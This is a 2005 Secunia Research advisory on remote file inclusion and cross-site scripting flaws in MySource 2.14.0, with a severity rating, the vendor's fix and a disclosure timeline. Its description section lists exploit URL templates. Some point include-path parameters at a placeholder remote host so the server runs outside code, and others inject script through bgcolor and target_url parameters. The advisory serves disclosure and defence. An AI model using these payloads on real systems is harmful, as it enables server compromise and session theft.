======================================================================

                     Secunia Research 18/10/2005

 - MySource Cross-Site Scripting and File Inclusion Vulnerabilities -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerabilities.......................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
About Secunia........................................................8
Verification.........................................................9

======================================================================
1) Affected Software

MySource 2.14.0

Prior versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: Cross-site scripting and system access
Where:  Remote

======================================================================
3) Vendor's Description of Software

MySource is a powerful, open source website and intranet content 
publishing and management system. It is designed to enable 
technically unskilled users to build and maintain their own web 
solutions securely, professionally and inexpensively.

Product link:
http://mysource.squiz.net/

======================================================================
4) Description of Vulnerabilities

Secunia Research has discovered some vulnerabilities in MySource, 
which can be exploited by malicious people to conduct 
cross-site scripting attacks and compromise a vulnerable system.

1) Some input isn't properly verified, before it used to include 
files. This can be exploited to include arbitrary files from external 
and local resources.

Examples:
http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?
INCLUDE_PATH=http://[host]/[file]?
http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?
SQUIZLIB_PATH=http://[host]/[file]?
http://[victim]/web/init_mysource.php?
INCLUDE_PATH=http://[host]/[file]?
http://[victim]/pear/Net_Socket/Socket.php?
PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/HTTP_Request/Request.php?
PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail/Mail.php?
PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date.php?
PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date/Span.php?
PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mimeDecode.php?
PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mime.php?
PEAR_PATH=http://[host]/[file]?

Successful exploitation requires that "register_globals" is enabled 
and that the affected scripts are placed accessible inside the 
web root.

2) Some input isn't properly sanitised before being returned to the 
user. This can be exploited to execute arbitrary HTML and script code 
in a user's browser session in context of an affected site.

Examples:
http://[victim]/web/edit/upgrade_in_progress_backend.php?
target_url=">[code]
http://[victim]/squizlib/bodycopy/pop_ups/insert_table.php?
bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_props.php?
bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/header.php?
bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_row_props.php?
bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_props.php?
bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/
edit_table_cell_type_wysiwyg.php?stylesheet=">[code]

Successful exploitation requires that "register_globals" is enabled 
and that the affected scripts are placed accessible inside the 
web root.

The vulnerabilities have been confirmed in version 2.14.0. Prior 
versions may also be affected.

======================================================================
5) Solution

The vendor has fixed the vulnerabilities in version 2.14.2 by warning 
the user during the installation process about the security risks of 
placing MySource script files in a publicly available folder and 
having "register_globals" enabled.

Users should set "register_globals" to "Off" and ensure that the 
MySource installation is moved out of the web root.

Installation process updated in version 2.14.2:
http://mysource.squiz.net/download/downloads/download_2.14.2

======================================================================
6) Time Table

30/09/2005 - Vulnerabilities discovered.
03/10/2005 - Vendor notified.
18/10/2005 - Vendor releases new version.
18/10/2005 - Public disclosure.

======================================================================
7) Credits

Discovered by Secunia Research.

======================================================================
8) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding
all the latest software vulnerabilities disclosed to the public. These
advisories are gathered in a publicly available database at the
Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all
relevant vulnerability information to their specific system
configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2005-51/advisory/

======================================================================